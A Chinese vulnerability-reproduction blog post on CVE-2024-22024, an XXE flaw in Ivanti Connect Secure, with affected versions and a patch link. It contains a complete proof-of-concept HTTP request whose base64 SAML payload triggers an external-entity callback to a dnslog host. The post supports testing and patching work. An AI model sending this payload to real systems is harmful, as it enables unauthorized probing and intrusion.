Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

admin

107255
文章

89
评论

2024年5月23日14:57:59评论42 views字数 1071阅读3分34秒阅读模式

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞介绍

Ivanti Connect Secure和Ivanti Policy Secure都是美国Ivanti公司的产品。Ivanti Connect Secure是安全远程网络连接工具。Ivanti Policy Secure是一个网络访问控制 (NAC) 解决方案。

Ivanti Connect Secure和Ivanti Policy Secure存在代码问题漏洞，该漏洞源于存在XML外部实体注入漏洞，允许攻击者在不知情的情况下访问某些受限资源。

0x02影响版本

Ivanti Connect_Secure 22.4,Ivanti Connect_Secure 9.1,Ivanti Connect_Secure 22.5

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

0x03漏洞复现

1.访问漏洞环境

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

2.对漏洞进行复现

POC （POT）

漏洞复现

POST /dana-na/auth/saml-sso.cgi HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 176Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

base64解码

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

测试dnslog

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

3.nuclei工具测试（漏洞存在）

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US

‍

原文始发于微信公众号（弥天安全实验室）：【成功复现】Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

左青龙
微信扫一扫

右白虎
微信扫一扫

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

SolarWinds Serv-U FTP 目录遍历文件读取漏洞(CVE-2024-28995)

SolarWinds Serv-U FTP 目录遍历致文件读取漏洞（CVE-2024-28995）

Magento Open Source XXE漏洞（CVE-2024-34102）

用友分析云存在druid未授权访问漏洞

CVE-2023-42793：TeamCity认证绕过RCE漏洞

CVE-2024-23917：TeamCity认证绕过RCE漏洞

Serv-U FTP 目录遍历（CVE-2024-28995）

「漏洞复现」海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

没有秘密 || 利用 Veeam CVE-2024-29855

海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

发表评论

在线咨询

微信